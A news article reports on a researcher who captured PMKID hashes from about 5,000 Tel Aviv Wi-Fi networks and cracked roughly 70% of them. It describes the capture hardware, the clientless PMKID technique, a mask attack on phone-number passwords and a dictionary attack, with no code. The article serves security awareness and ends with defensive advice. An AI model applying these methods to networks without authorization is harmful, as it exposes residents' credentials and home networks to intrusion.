Expert Hacks 70% of Tel Aviv Wi-Fi Networks for Research
CyberArk specialist Ido Hoorvitch managed to hack 70% of Wi-Fi networks in his hometown of Tel Aviv as part of a research project aimed at demonstrating how poorly protected home networks are and how easily they can be compromised.
For his experiment, Hoorvitch walked around the city with sniffing equipment and collected data from 5,000 network hashes. He then exploited a vulnerability that allows the extraction of the PMKID hash, which is typically generated for roaming purposes. The PMKID hash consists of the network SSID, passphrase, MAC address, and a static integer.
To obtain the PMKID hashes, he used a $50 AWUS036ACH ALFA network card, which can function both as a monitor and a packet injection tool, and analyzed the data with WireShark on Ubuntu.
Using a method developed by Jens “atom” Steube (the lead developer of Hashcat), Hoorvitch collected PMKIDs, which were then cracked to reveal passwords. “Atom’s method does not require a client, so there’s no need to capture a user’s login in real time or wait for users to connect to the network,” Hoorvitch explained. “Moreover, an attacker only needs to capture a single frame and can filter out incorrect passwords and corrupted frames that interfere with the cracking process.”
Hoorvitch started with a mask attack to identify people who use their mobile phone numbers as Wi-Fi passwords—a common practice in Israel. To crack such passwords, he generated all possible Israeli phone numbers, which are ten digits long and always start with 05, leaving eight digits to guess.
Using a regular laptop and this technique, the researcher successfully compromised 2,200 passwords at an average rate of nine minutes per password. In the next phase, he switched to a dictionary attack using Rockyou.txt, which quickly cracked another 1,359 passwords, most of which used only lowercase characters.
In total, Hoorvitch successfully compromised about 70% of the passwords for the selected Wi-Fi networks, confirming his suspicions about the poor security of Wi-Fi networks.
The expert concludes that users should not enable the roaming feature on routers intended for personal use (WPA2-personal), as there is no need for roaming in such networks. He also notes that passwords longer than 10 characters or digits are much more resistant to cracking.